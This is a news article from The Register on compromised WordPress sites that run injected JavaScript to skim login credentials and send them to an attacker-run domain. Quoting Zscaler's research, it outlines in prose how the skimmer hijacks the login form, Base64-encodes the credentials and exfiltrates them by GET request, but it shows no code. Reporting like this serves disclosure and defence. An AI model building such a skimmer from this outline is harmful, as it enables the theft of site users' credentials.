Oh no, you're thinking, yet another cookie pop-up. Well, sorry, it's the law. We measure how many people read us, and ensure you see relevant ads, by storing cookies on your device. If you're cool with that, hit “Accept all Cookies”. For more info and to customize your settings, hit “Customize Settings”.

Review and manage your consent

Here's an overview of our use of cookies, similar technologies and how to manage them. You can also change your choices at any time, by hitting the “Your Consent Options” link on the site's footer.

Manage Cookie Preferences
  • These cookies are strictly necessary so that you can navigate the site as normal and use all features. Without these cookies we cannot provide you with the service that you expect.

  • These cookies are used to make advertising messages more relevant to you. They perform functions like preventing the same ad from continuously reappearing, ensuring that ads are properly displayed for advertisers, and in some cases selecting advertisements that are based on your interests.

  • These cookies collect information in aggregate form to help us understand how our websites are being used. They allow us to count visits and traffic sources so that we can measure and improve the performance of our sites. If people say no to these cookies, we do not know how many people have visited and we cannot monitor performance.

See also our Cookie policy and Privacy policy.

This article is more than 1 year old

Small WordPress sites leaking like sieves

Login-stealing C&C server spotted

Wordpress admins hoping for some feet up time after last week's Twenty Fifteen XSS plugin vulnerability appear to have yet another vulnerability to handle.

Researchers at Zcaler have identified a bunch of compromised sites that are all leaking user credentials to the same target domain – conyouse.com hosts the command and control.

The researchers haven't yet identified which particular vulnerability is being used to invade the WordPress sites under attack. Most of the domains in their list look to El Reg like they're managed by individuals or small community groups (for example, if you know someone involved with the Blissfields Festival, or in the Glasgow Contemporary Choir, tell them they need to patch), so may not have the world's most most vigilant webmasters.

Zscaler's blog post notes: “The compromised sites run backdoor code, which activates when the user submits login credentials. The credentials are encoded and sent to an attacker website in the form of a GET request. Till now, we have identified only one domain "conyouse.com" which is collecting all the credentials from these compromised sites.”

The vulnerable sites serve up login pages with JavaScript injected to do the credential-stealing. The code is in a wp.js file,

The obfuscated JavaScript code present in “wp.js” file can be seen here:

Zscaler's grab of the malicious login script

Part of the attack caught by Zscaler

Zscaler continues: “The form containing the username and password input box has a fixed name as ‘loginform‘ in all WordPress sites.

“The preventDefault event method is used to cancel the submit event for 'loginform' entity and execute the alternate code which is present in this file. The login credential string is serialised and encoded in a Base64 format.”

Get patching. ®

 

Similar topics

TIP US OFF

Send us news


Other stories you might like